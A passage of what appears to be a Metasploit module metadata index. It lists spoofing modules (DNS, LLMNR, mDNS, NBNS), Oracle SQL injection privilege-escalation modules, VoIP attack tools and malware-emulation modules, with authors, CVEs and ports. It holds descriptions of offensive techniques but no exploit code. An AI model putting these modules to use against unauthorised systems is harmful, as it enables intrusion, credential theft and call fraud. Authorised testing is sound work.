"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_spoof/dns/compare_results": {
"name": "DNS Lookup Result Comparison",
"full_name": "auxiliary/spoof/dns/compare_results",
"rank": 300,
"disclosure_date": "2008-07-21",
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module can be used to determine differences\n in the cache entries between two DNS servers. This is\n primarily useful for detecting cache poisoning attacks,\n but can also be used to detect geo-location load balancing.",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-08-28 20:17:58 +0000",
"path": "/modules/auxiliary/spoof/dns/compare_results.rb",
"is_install_path": true,
"ref_name": "spoof/dns/compare_results",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_spoof/dns/native_spoofer": {
"name": "Native DNS Spoofer (Example)",
"full_name": "auxiliary/spoof/dns/native_spoofer",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"RageLtMan <rageltman@sempervictus>"
],
"description": "This module provides a Rex based DNS service to resolve queries intercepted\n via the capture mixin. Configure STATIC_ENTRIES to contain host-name mappings\n desired for spoofing using a hostsfile or space/semicolon separated entries.\n In default configuration, the service operates as a normal native DNS server\n with the exception of consuming from and writing to the wire as opposed to a\n listening socket. Best when compromising routers or spoofing L2 in order to\n prevent return of the real reply which causes a race condition. The method\n by which replies are filtered is up to the user (though iptables works fine).",
"references": [
],
"platform": "",
"arch": "",
"rport": 53,
"autofilter_ports": [
53
],
"autofilter_services": [
"dns"
],
"targets": null,
"mod_time": "2018-01-31 23:44:51 +0000",
"path": "/modules/auxiliary/spoof/dns/native_spoofer.rb",
"is_install_path": true,
"ref_name": "spoof/dns/native_spoofer",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_spoof/llmnr/llmnr_response": {
"name": "LLMNR Spoofer",
"full_name": "auxiliary/spoof/llmnr/llmnr_response",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Robin Francois <rof@navixia.com>"
],
"description": "LLMNR (Link-local Multicast Name Resolution) is the successor of NetBIOS (Windows Vista and up) and is used to\n resolve the names of neighboring computers. This module forges LLMNR responses by listening for LLMNR requests\n sent to the LLMNR multicast address (224.0.0.252) and responding with a user-defined spoofed IP address.",
"references": [
"URL-http://www.ietf.org/rfc/rfc4795.txt"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/spoof/llmnr/llmnr_response.rb",
"is_install_path": true,
"ref_name": "spoof/llmnr/llmnr_response",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_spoof/mdns/mdns_response": {
"name": "mDNS Spoofer",
"full_name": "auxiliary/spoof/mdns/mdns_response",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Joe Testa <jtesta@positronsecurity.com>",
"James Lee <egypt@metasploit.com>",
"Robin Francois <rof@navixia.com>"
],
"description": "This module will listen for mDNS multicast requests on 5353/udp for A and AAAA record queries, and respond with a spoofed IP address (assuming the request matches our regex).",
"references": [
"URL-https://tools.ietf.org/html/rfc6762"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/spoof/mdns/mdns_response.rb",
"is_install_path": true,
"ref_name": "spoof/mdns/mdns_response",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_spoof/nbns/nbns_response": {
"name": "NetBIOS Name Service Spoofer",
"full_name": "auxiliary/spoof/nbns/nbns_response",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Tim Medin <tim@securitywhole.com>"
],
"description": "This module forges NetBIOS Name Service (NBNS) responses. It will listen for NBNS requests\n sent to the local subnet's broadcast address and spoof a response, redirecting the querying\n machine to an IP of the attacker's choosing. Combined with auxiliary/server/capture/smb or\n auxiliary/server/capture/http_ntlm it is a highly effective means of collecting crackable hashes on\n common networks.\n\n This module must be run as root and will bind to udp/137 on all interfaces.",
"references": [
"URL-http://www.packetstan.com/2011/03/nbns-spoofing-on-your-way-to-world.html"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/spoof/nbns/nbns_response.rb",
"is_install_path": true,
"ref_name": "spoof/nbns/nbns_response",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_spoof/replay/pcap_replay": {
"name": "Pcap Replay Utility",
"full_name": "auxiliary/spoof/replay/pcap_replay",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"amaloteaux <alex_maloteaux@metasploit.com>"
],
"description": "Replay a pcap capture file",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/spoof/replay/pcap_replay.rb",
"is_install_path": true,
"ref_name": "spoof/replay/pcap_replay",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_sqli/oracle/dbms_cdc_ipublish": {
"name": "Oracle DB SQL Injection via SYS.DBMS_CDC_IPUBLISH.ALTER_HOTLOG_INTERNAL_CSOURCE",
"full_name": "auxiliary/sqli/oracle/dbms_cdc_ipublish",
"rank": 300,
"disclosure_date": "2008-10-22",
"type": "auxiliary",
"author": [
"MC <mc@metasploit.com>"
],
"description": "The module exploits an sql injection flaw in the ALTER_HOTLOG_INTERNAL_CSOURCE\n procedure of the PL/SQL package DBMS_CDC_IPUBLISH. Any user with execute privilege\n on the vulnerable package can exploit this vulnerability. By default, users granted\n EXECUTE_CATALOG_ROLE have the required privilege. Affected versions: Oracle Database\n Server versions 10gR1, 10gR2 and 11gR1. Fixed with October 2008 CPU.",
"references": [
"CVE-2008-3996",
"OSVDB-49321"
],
"platform": "",
"arch": "",
"rport": "1521",
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/sqli/oracle/dbms_cdc_ipublish.rb",
"is_install_path": true,
"ref_name": "sqli/oracle/dbms_cdc_ipublish",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_sqli/oracle/dbms_cdc_publish": {
"name": "Oracle DB SQL Injection via SYS.DBMS_CDC_PUBLISH.ALTER_AUTOLOG_CHANGE_SOURCE",
"full_name": "auxiliary/sqli/oracle/dbms_cdc_publish",
"rank": 300,
"disclosure_date": "2008-10-22",
"type": "auxiliary",
"author": [
"MC <mc@metasploit.com>"
],
"description": "The module exploits an sql injection flaw in the ALTER_AUTOLOG_CHANGE_SOURCE\n procedure of the PL/SQL package DBMS_CDC_PUBLISH. Any user with execute privilege\n on the vulnerable package can exploit this vulnerability. By default, users granted\n EXECUTE_CATALOG_ROLE have the required privilege.\n Affected versions: Oracle Database Server versions 10gR1, 10gR2 and 11gR1.\n Fixed with October 2008 CPU.",
"references": [
"CVE-2008-3995",
"OSVDB-49320"
],
"platform": "",
"arch": "",
"rport": "1521",
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/sqli/oracle/dbms_cdc_publish.rb",
"is_install_path": true,
"ref_name": "sqli/oracle/dbms_cdc_publish",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_sqli/oracle/dbms_cdc_publish2": {
"name": "Oracle DB SQL Injection via SYS.DBMS_CDC_PUBLISH.DROP_CHANGE_SOURCE",
"full_name": "auxiliary/sqli/oracle/dbms_cdc_publish2",
"rank": 300,
"disclosure_date": "2010-04-26",
"type": "auxiliary",
"author": [
"MC <mc@metasploit.com>"
],
"description": "The module exploits an sql injection flaw in the DROP_CHANGE_SOURCE\n procedure of the PL/SQL package DBMS_CDC_PUBLISH. Any user with execute privilege\n on the vulnerable package can exploit this vulnerability. By default, users granted\n EXECUTE_CATALOG_ROLE have the required privilege.",
"references": [
"CVE-2010-0870",
"OSVDB-63772",
"URL-http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuapr2010.html"
],
"platform": "",
"arch": "",
"rport": "1521",
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/sqli/oracle/dbms_cdc_publish2.rb",
"is_install_path": true,
"ref_name": "sqli/oracle/dbms_cdc_publish2",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_sqli/oracle/dbms_cdc_publish3": {
"name": "Oracle DB SQL Injection via SYS.DBMS_CDC_PUBLISH.CREATE_CHANGE_SET",
"full_name": "auxiliary/sqli/oracle/dbms_cdc_publish3",
"rank": 300,
"disclosure_date": "2010-10-13",
"type": "auxiliary",
"author": [
"MC <mc@metasploit.com>"
],
"description": "The module exploits an sql injection flaw in the CREATE_CHANGE_SET\n procedure of the PL/SQL package DBMS_CDC_PUBLISH. Any user with execute privilege\n on the vulnerable package can exploit this vulnerability. By default, users granted\n EXECUTE_CATALOG_ROLE have the required privilege.",
"references": [
"CVE-2010-2415",
"OSVDB-70078",
"URL-http://www.oracle.com/technetwork/topics/security/cpuoct2010-175626.html"
],
"platform": "",
"arch": "",
"rport": "1521",
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/sqli/oracle/dbms_cdc_publish3.rb",
"is_install_path": true,
"ref_name": "sqli/oracle/dbms_cdc_publish3",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_sqli/oracle/dbms_cdc_subscribe_activate_subscription": {
"name": "Oracle DB SQL Injection via SYS.DBMS_CDC_SUBSCRIBE.ACTIVATE_SUBSCRIPTION",
"full_name": "auxiliary/sqli/oracle/dbms_cdc_subscribe_activate_subscription",
"rank": 300,
"disclosure_date": "2005-04-18",
"type": "auxiliary",
"author": [
"Esteban Martinez Fayo",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module will escalate an Oracle DB user to DBA by exploiting a sql injection\n bug in the SYS.DBMS_CDC_SUBSCRIBE.ACTIVATE_SUBSCRIPTION package/function.\n This vulnerability affects Oracle Database Server 9i up to 9.2.0.5 and\n 10g up to 10.1.0.4.",
"references": [
"CVE-2005-4832",
"BID-13236",
"OSVDB-15553",
"URL-http://www.appsecinc.com/resources/alerts/oracle/2005-02.html",
"URL-http://www.argeniss.com/research/OraDBMS_CDC_SUBSCRIBEExploit.txt"
],
"platform": "",
"arch": "",
"rport": "1521",
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-08-28 20:17:58 +0000",
"path": "/modules/auxiliary/sqli/oracle/dbms_cdc_subscribe_activate_subscription.rb",
"is_install_path": true,
"ref_name": "sqli/oracle/dbms_cdc_subscribe_activate_subscription",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_sqli/oracle/dbms_export_extension": {
"name": "Oracle DB SQL Injection via DBMS_EXPORT_EXTENSION",
"full_name": "auxiliary/sqli/oracle/dbms_export_extension",
"rank": 300,
"disclosure_date": "2006-04-26",
"type": "auxiliary",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module will escalate an Oracle DB user to DBA by exploiting a\n sql injection bug in the DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_METADATA package.\n\n Note: This module has been tested against 9i, 10gR1 and 10gR2.",
"references": [
"CVE-2006-2081",
"OSVDB-25002",
"BID-17699",
"URL-http://www.red-database-security.com/exploits/oracle-sql-injection-oracle-dbms_export_extension.html"
],
"platform": "",
"arch": "",
"rport": "1521",
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-08-28 20:17:58 +0000",
"path": "/modules/auxiliary/sqli/oracle/dbms_export_extension.rb",
"is_install_path": true,
"ref_name": "sqli/oracle/dbms_export_extension",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_sqli/oracle/dbms_metadata_get_granted_xml": {
"name": "Oracle DB SQL Injection via SYS.DBMS_METADATA.GET_GRANTED_XML",
"full_name": "auxiliary/sqli/oracle/dbms_metadata_get_granted_xml",
"rank": 300,
"disclosure_date": "2008-01-05",
"type": "auxiliary",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module will escalate an Oracle DB user to DBA by exploiting a sql injection\n bug in the SYS.DBMS_METADATA.GET_GRANTED_XML package/function.",
"references": [
"URL-http://www.metasploit.com"
],
"platform": "",
"arch": "",
"rport": "1521",
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-08-28 20:17:58 +0000",
"path": "/modules/auxiliary/sqli/oracle/dbms_metadata_get_granted_xml.rb",
"is_install_path": true,
"ref_name": "sqli/oracle/dbms_metadata_get_granted_xml",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_sqli/oracle/dbms_metadata_get_xml": {
"name": "Oracle DB SQL Injection via SYS.DBMS_METADATA.GET_XML",
"full_name": "auxiliary/sqli/oracle/dbms_metadata_get_xml",
"rank": 300,
"disclosure_date": "2008-01-05",
"type": "auxiliary",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module will escalate an Oracle DB user to DBA by exploiting a sql injection\n bug in the SYS.DBMS_METADATA.GET_XML package/function.",
"references": [
"URL-http://www.metasploit.com"
],
"platform": "",
"arch": "",
"rport": "1521",
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-08-28 20:17:58 +0000",
"path": "/modules/auxiliary/sqli/oracle/dbms_metadata_get_xml.rb",
"is_install_path": true,
"ref_name": "sqli/oracle/dbms_metadata_get_xml",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_sqli/oracle/dbms_metadata_open": {
"name": "Oracle DB SQL Injection via SYS.DBMS_METADATA.OPEN",
"full_name": "auxiliary/sqli/oracle/dbms_metadata_open",
"rank": 300,
"disclosure_date": "2008-01-05",
"type": "auxiliary",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module will escalate an Oracle DB user to DBA by exploiting a SQL injection\n bug in the SYS.DBMS_METADATA.OPEN package/function.",
"references": [
"URL-http://www.metasploit.com"
],
"platform": "",
"arch": "",
"rport": "1521",
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/sqli/oracle/dbms_metadata_open.rb",
"is_install_path": true,
"ref_name": "sqli/oracle/dbms_metadata_open",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_sqli/oracle/droptable_trigger": {
"name": "Oracle DB SQL Injection in MDSYS.SDO_TOPO_DROP_FTBL Trigger",
"full_name": "auxiliary/sqli/oracle/droptable_trigger",
"rank": 300,
"disclosure_date": "2009-01-13",
"type": "auxiliary",
"author": [
"Sh2kerr <research[ad]dsec.ru>"
],
"description": "This module will escalate an Oracle DB user to MDSYS by exploiting a SQL injection bug in\n the MDSYS.SDO_TOPO_DROP_FTBL trigger. After that, the exploit escalates the user to DBA using the \"CREATE ANY TRIGGER\" privilege\n given to the MDSYS user by creating a malicious trigger in the SYSTEM schema (2-stage attack).",
"references": [
"CVE-2008-3979",
"OSVDB-51354",
"URL-http://www.securityfocus.com/archive/1/500061",
"URL-http://www.ngssoftware.com/"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-08-28 20:17:58 +0000",
"path": "/modules/auxiliary/sqli/oracle/droptable_trigger.rb",
"is_install_path": true,
"ref_name": "sqli/oracle/droptable_trigger",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_sqli/oracle/jvm_os_code_10g": {
"name": "Oracle DB 10gR2, 11gR1/R2 DBMS_JVM_EXP_PERMS OS Command Execution",
"full_name": "auxiliary/sqli/oracle/jvm_os_code_10g",
"rank": 300,
"disclosure_date": "2010-02-01",
"type": "auxiliary",
"author": [
"sid <sid@notsosecure.com>"
],
"description": "This module exploits a flaw (0 day) in the DBMS_JVM_EXP_PERMS package that allows\n any user with the CREATE SESSION privilege to grant themselves Java IO privileges.\n Identified by David Litchfield. Works on 10g R2, 11g R1 and R2 (Windows only).",
"references": [
"CVE-2010-0866",
"OSVDB-62184",
"URL-http://blackhat.com/html/bh-dc-10/bh-dc-10-archives.html#Litchfield",
"URL-http://www.notsosecure.com/folder2/2010/02/04/hacking-oracle-11g/"
],
"platform": "",
"arch": "",
"rport": "1521",
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/sqli/oracle/jvm_os_code_10g.rb",
"is_install_path": true,
"ref_name": "sqli/oracle/jvm_os_code_10g",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_sqli/oracle/jvm_os_code_11g": {
"name": "Oracle DB 11g R1/R2 DBMS_JVM_EXP_PERMS OS Code Execution",
"full_name": "auxiliary/sqli/oracle/jvm_os_code_11g",
"rank": 300,
"disclosure_date": "2010-02-01",
"type": "auxiliary",
"author": [
"sid <sid@notsosecure.com>"
],
"description": "This module exploits a flaw (0 day) in the DBMS_JVM_EXP_PERMS package that allows\n any user with the CREATE SESSION privilege to grant themselves Java IO privileges.\n Identified by David Litchfield. Works on 11g R1 and R2 (Windows only).",
"references": [
"CVE-2010-0866",
"OSVDB-62184",
"URL-http://blackhat.com/html/bh-dc-10/bh-dc-10-archives.html#Litchfield",
"URL-http://www.notsosecure.com/folder2/2010/02/04/hacking-oracle-11g/"
],
"platform": "",
"arch": "",
"rport": "1521",
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/sqli/oracle/jvm_os_code_11g.rb",
"is_install_path": true,
"ref_name": "sqli/oracle/jvm_os_code_11g",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_sqli/oracle/lt_compressworkspace": {
"name": "Oracle DB SQL Injection via SYS.LT.COMPRESSWORKSPACE",
"full_name": "auxiliary/sqli/oracle/lt_compressworkspace",
"rank": 300,
"disclosure_date": "2008-10-13",
"type": "auxiliary",
"author": [
"CG <cg@carnal0wnage.com>"
],
"description": "This module exploits a SQL injection flaw in the COMPRESSWORKSPACE\n procedure of the PL/SQL package SYS.LT. Any user with execute\n privilege on the vulnerable package can exploit this vulnerability.",
"references": [
"CVE-2008-3982",
"OSVDB-49324",
"URL-http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuoct2008.html"
],
"platform": "",
"arch": "",
"rport": "1521",
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/sqli/oracle/lt_compressworkspace.rb",
"is_install_path": true,
"ref_name": "sqli/oracle/lt_compressworkspace",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_sqli/oracle/lt_findricset_cursor": {
"name": "Oracle DB SQL Injection via SYS.LT.FINDRICSET Evil Cursor Method",
"full_name": "auxiliary/sqli/oracle/lt_findricset_cursor",
"rank": 300,
"disclosure_date": "2007-10-17",
"type": "auxiliary",
"author": [
"CG <cg@carnal0wnage.com>"
],
"description": "This module will escalate an Oracle DB user to DBA by exploiting\n a SQL injection bug in the SYS.LT.FINDRICSET package via the Evil\n Cursor technique. Tested on Oracle 10.1.0.3.0 -- should work\n through 10.1.0.5.0 and supposedly on 11g. Fixed with the Oracle Critical\n Patch Update of October 2007.",
"references": [
"CVE-2007-5511",
"OSVDB-40079",
"BID-26098",
"URL-http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuoct2007.html"
],
"platform": "",
"arch": "",
"rport": "1521",
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-08-28 20:17:58 +0000",
"path": "/modules/auxiliary/sqli/oracle/lt_findricset_cursor.rb",
"is_install_path": true,
"ref_name": "sqli/oracle/lt_findricset_cursor",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_sqli/oracle/lt_mergeworkspace": {
"name": "Oracle DB SQL Injection via SYS.LT.MERGEWORKSPACE",
"full_name": "auxiliary/sqli/oracle/lt_mergeworkspace",
"rank": 300,
"disclosure_date": "2008-10-22",
"type": "auxiliary",
"author": [
"CG <cg@carnal0wnage.com>"
],
"description": "This module exploits a SQL injection flaw in the MERGEWORKSPACE\n procedure of the PL/SQL package SYS.LT. Any user with execute\n privilege on the vulnerable package can exploit this vulnerability.",
"references": [
"CVE-2008-3983",
"OSVDB-49325",
"URL-http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuoct2008.html",
"URL-http://www.dsecrg.com/pages/expl/show.php?id=23"
],
"platform": "",
"arch": "",
"rport": "1521",
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-08-28 20:17:58 +0000",
"path": "/modules/auxiliary/sqli/oracle/lt_mergeworkspace.rb",
"is_install_path": true,
"ref_name": "sqli/oracle/lt_mergeworkspace",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_sqli/oracle/lt_removeworkspace": {
"name": "Oracle DB SQL Injection via SYS.LT.REMOVEWORKSPACE",
"full_name": "auxiliary/sqli/oracle/lt_removeworkspace",
"rank": 300,
"disclosure_date": "2008-10-13",
"type": "auxiliary",
"author": [
"Sh2kerr <research[ad]dsecrg.com>"
],
"description": "This module exploits a SQL injection flaw in the REMOVEWORKSPACE\n procedure of the PL/SQL package SYS.LT. Any user with execute\n privilege on the vulnerable package can exploit this vulnerability.",
"references": [
"CVE-2008-3984",
"OSVDB-49326"
],
"platform": "",
"arch": "",
"rport": "1521",
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-08-28 20:17:58 +0000",
"path": "/modules/auxiliary/sqli/oracle/lt_removeworkspace.rb",
"is_install_path": true,
"ref_name": "sqli/oracle/lt_removeworkspace",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_sqli/oracle/lt_rollbackworkspace": {
"name": "Oracle DB SQL Injection via SYS.LT.ROLLBACKWORKSPACE",
"full_name": "auxiliary/sqli/oracle/lt_rollbackworkspace",
"rank": 300,
"disclosure_date": "2009-05-04",
"type": "auxiliary",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a SQL injection flaw in the ROLLBACKWORKSPACE\n procedure of the PL/SQL package SYS.LT. Any user with execute\n privilege on the vulnerable package can exploit this vulnerability.",
"references": [
"CVE-2009-0978",
"OSVDB-53734",
"URL-http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuapr2009.html"
],
"platform": "",
"arch": "",
"rport": "1521",
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-08-28 20:17:58 +0000",
"path": "/modules/auxiliary/sqli/oracle/lt_rollbackworkspace.rb",
"is_install_path": true,
"ref_name": "sqli/oracle/lt_rollbackworkspace",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_voip/asterisk_login": {
"name": "Asterisk Manager Login Utility",
"full_name": "auxiliary/voip/asterisk_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"dflah_ <dflah@alligatorteam.org>"
],
"description": "This module attempts to authenticate to an Asterisk Manager service. Please note\n that by default, Asterisk Call Management (port 5038) only listens locally, but\n this can be manually configured in the file /etc/asterisk/manager.conf by the admin\n on the victim machine.",
"references": [
"URL-http://www.asterisk.org/astdocs/node201.html"
],
"platform": "",
"arch": "",
"rport": 5038,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/voip/asterisk_login.rb",
"is_install_path": true,
"ref_name": "voip/asterisk_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_voip/cisco_cucdm_call_forward": {
"name": "Viproy CUCDM IP Phone XML Services - Call Forwarding Tool",
"full_name": "auxiliary/voip/cisco_cucdm_call_forward",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"fozavci"
],
"description": "The BVSMWeb portal in the web framework in Cisco Unified Communications Domain Manager\n (CDM) 10 does not properly implement access control, which allows remote attackers to\n modify user information. This module exploits the vulnerability to configure unauthorized\n call forwarding.",
"references": [
"CVE-2014-3300",
"BID-68331"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/voip/cisco_cucdm_call_forward.rb",
"is_install_path": true,
"ref_name": "voip/cisco_cucdm_call_forward",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_voip/cisco_cucdm_speed_dials": {
"name": "Viproy CUCDM IP Phone XML Services - Speed Dial Attack Tool",
"full_name": "auxiliary/voip/cisco_cucdm_speed_dials",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"fozavci"
],
"description": "The BVSMWeb portal in the web framework in Cisco Unified Communications Domain Manager\n (CDM), before version 10, does not properly implement access control, which allows remote\n attackers to modify user information. This module exploits the vulnerability to make\n unauthorized modifications to speed dial entries.",
"references": [
"CVE-2014-3300",
"BID-68331"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-08-28 20:17:58 +0000",
"path": "/modules/auxiliary/voip/cisco_cucdm_speed_dials.rb",
"is_install_path": true,
"ref_name": "voip/cisco_cucdm_speed_dials",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_voip/sip_deregister": {
"name": "SIP Deregister Extension",
"full_name": "auxiliary/voip/sip_deregister",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"ChrisJohnRiley"
],
"description": "This module will attempt to deregister a SIP user from the provider. It\n has been tested successfully when the SIP provider/server doesn't use REGISTER\n authentication.",
"references": [
],
"platform": "",
"arch": "",
"rport": 5060,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2019-03-05 04:43:37 +0000",
"path": "/modules/auxiliary/voip/sip_deregister.rb",
"is_install_path": true,
"ref_name": "voip/sip_deregister",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_voip/sip_invite_spoof": {
"name": "SIP Invite Spoof",
"full_name": "auxiliary/voip/sip_invite_spoof",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"David Maynor <dave@erratasec.com>",
"ChrisJohnRiley"
],
"description": "This module will create a fake SIP INVITE request, making the targeted device ring\n and display fake caller ID information.",
"references": [
],
"platform": "",
"arch": "",
"rport": 5060,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2019-03-05 04:43:37 +0000",
"path": "/modules/auxiliary/voip/sip_invite_spoof.rb",
"is_install_path": true,
"ref_name": "voip/sip_invite_spoof",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_voip/telisca_ips_lock_control": {
"name": "Telisca IPS Lock Cisco IP Phone Control",
"full_name": "auxiliary/voip/telisca_ips_lock_control",
"rank": 300,
"disclosure_date": "2015-12-17",
"type": "auxiliary",
"author": [
"Fakhir Karim Reda <karim.fakhir@gmail.com>",
"zirsalem"
],
"description": "This module allows an unauthenticated attacker to exercise the\n \"Lock\" and \"Unlock\" functionality of Telisca IPS Lock for Cisco IP\n Phones. This module should be run in the VoIP VLAN, and requires\n knowledge of the target phone's name (for example, SEP002497AB1D4B).\n\n Set ACTION to either LOCK or UNLOCK. UNLOCK is the default.",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/voip/telisca_ips_lock_control.rb",
"is_install_path": true,
"ref_name": "voip/telisca_ips_lock_control",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_vsploit/malware/dns/dns_mariposa": {
"name": "VSploit Mariposa DNS Query Module",
"full_name": "auxiliary/vsploit/malware/dns/dns_mariposa",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"MJC"
],
"description": "This module queries known Mariposa Botnet DNS records.",
"references": [
"URL-http://www.defintel.com/docs/Mariposa_Analysis.pdf"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/vsploit/malware/dns/dns_mariposa.rb",
"is_install_path": true,
"ref_name": "vsploit/malware/dns/dns_mariposa",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_vsploit/malware/dns/dns_query": {
"name": "VSploit DNS Beaconing Emulation",
"full_name": "auxiliary/vsploit/malware/dns/dns_query",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
